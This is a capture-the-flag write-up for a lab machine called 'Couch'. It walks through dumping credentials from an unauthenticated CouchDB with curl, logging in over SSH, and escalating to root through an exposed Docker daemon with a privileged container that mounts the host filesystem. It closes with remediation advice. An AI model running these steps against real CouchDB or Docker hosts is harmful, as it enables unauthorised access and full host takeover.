Target IP: couch.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Couch” is a Linux machine that exposes a CouchDB database instance without authentication. We gain initial access by enumerating the database via REST API (curl) to retrieve valid SSH credentials. Privilege escalation is achieved by analyzing .bash_history, which reveals a command to exploit an exposed Docker Daemon on localhost (Port 2375), allowing us to mount the host filesystem and access root.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): using Rustscan for rapid port discovery.
  • T1592 (Gather Victim Host Information): Enumerating CouchDB via API.
  • T1078 (Valid Accounts): Recovering SSH credentials from the database.
  • T1552 (Unsecured Credentials): Finding exploit commands in .bash_history.
  • T1611 (Escape to Host): Docker privilege escalation via exposed TCP socket.

2. Operational Setup

Host Configuration

echo "10.10.x.x couch.thm" | sudo tee -a /etc/hosts

3. Enumeration: “Rustscan to the rescue”

A. Network Scanning

Standard Nmap can be slow. rustscan is excellent for quickly identifying open ports before running heavy scripts.

rustscan -a couch.thm -- -sC -sV

Results:

  • 22/tcp (SSH): OpenSSH.
  • 5984/tcp (CouchDB): Apache CouchDB httpd 1.6.1.

B. CouchDB Enumeration

CouchDB uses a RESTful API. We don’t need a specialized tool; curl works perfectly. Reference: CouchDB Tour

1. Check Connection:

curl http://couch.thm:5984/
# Output: {"couchdb":"Welcome","uuid":"...","version":"1.6.1",...}

2. List Databases:

curl -X GET http://couch.thm:5984/_all_dbs
# Output: ["_replicator","_users","secret"]
  • Analysis: The secret database looks interesting.

3. Dump the Secret DB:

curl -X GET http://couch.thm:5984/secret/_all_docs
# Returns IDs. Then we query the specific document ID found (e.g., "passwordbackup").
curl -X GET http://couch.thm:5984/secret/passwordbackup

Result: We find credentials (likely for a user named athena or similar).

  • User: athena
  • Password: [REDACTED]

4. Initial Access: SSH

With the credentials found in the database, we log in.

ssh athena@couch.thm

User Flag: /home/athena/user.txt.


5. Privilege Escalation: Docker Daemon Abuse

Enumeration (linpeas & History)

You ran linpeas.sh, which usually flags .bash_history if it is readable and contains sensitive info.

cat ~/.bash_history

Finding: The history contains a Docker command targeting a local port.

The Vulnerability

Docker is not just a command; it is a client-server architecture. The Docker CLI talks to a Docker Daemon. Usually, this is a Unix socket (/var/run/docker.sock), but here it is exposed over TCP on localhost port 2375.

If we can talk to the daemon, we can tell it to mount the host’s hard drive into a container.

Exploitation

The command found in history (or constructed manually):

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

Breakdown of the “Magic” Command:

  • -H 127.0.0.1:2375: Tell the Docker client to talk to the daemon listening on this local port (instead of the default socket).
  • run: Run a container.
  • --rm: Delete it when we exit (cleanup).
  • -it: Interactive mode (give us a shell).
  • --privileged: Give the container extended privileges (access to devices).
  • --net=host: Use the host’s network stack (optional but good for stability).
  • -v /:/mnt: The Kill Shot. Mount the host’s root directory (/) to the container’s /mnt folder.
  • alpine: The image name.

Result: You drop into a shell inside the container.

# inside container
cd /mnt/root
cat root.txt

Since / is mounted to /mnt, the host’s root flag is at /mnt/root/root.txt.


6. Remediation (Blue Team)

  1. CouchDB Security:
  • Authentication: CouchDB should require authentication for all API access.
  • Network Binding: Bind the service to 127.0.0.1 if it is only needed locally, or use a firewall to restrict access.
  1. Docker Security:
  • Daemon Exposure: Never expose the Docker daemon API (Port 2375) without TLS authentication.
  • User History: Periodically clear .bash_history or configure the shell not to save commands starting with a space to prevent leaking previous exploit attempts or secrets.
  1. Secrets Management: Do not store credentials in plaintext databases named “secret”. Use a Vault or proper configuration management.